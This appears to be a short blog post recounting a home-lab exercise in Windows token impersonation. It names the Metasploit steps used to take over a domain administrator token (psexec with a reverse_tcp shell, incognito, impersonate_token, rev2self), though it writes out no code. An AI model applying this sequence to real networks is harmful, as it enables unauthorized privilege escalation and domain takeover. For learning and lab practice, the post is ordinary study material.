Token Impersonation

Today was all about token impersonation. The concept is pretty easy to understand if you’ve been around the internet long enough. It’s basically a cookie.

A cookie, from a webpage, will grant you continued access to resources through a small file that is placed on your computer temporarily. A token, by contrast, is the same thing, except it allows network access to resources including Remote Desktop, and network drives.

If a user logs on, and has a network account, a token is created that can then be used by an attacker. In the case of today, my lab was set up with an account on a regular workstation that had domain administrator privileges. That was going to be the account to target.

Unfortunately, I have not learned how to do this yet without the help of meterpreter, but it was no matter; whichever way you can take over a network is fun! So with meterpreter, we used psexec, which I’ve written about in the past. The payload was a reverse_tcp shell, and the attack was pretty straight forward. The workstation was previously pwnd, so it was time to just play around with the tokens.

within meterpreter, I loaded incognito, listed the tokens available, looked for a domain administrator, and started the attack. With the impersonate token command, I could add users, groups, and a couple other things. It was interesting at this point that I couldn’t do a hashdump with the token impersonation because it didn’t have the privileges; so instead, i just typed rev2self which put me back to the original state on the pwnd machine (who I was before I impersonated the token).

This attack could be fun and very useful. I was able to take over so easily today because it was a lab that I created, but I would love to try it on a bigger network of which I have no knowledge. Perhaps I’ll look around for friends who have created their own networks and see if we can share challenges!

Scroll to top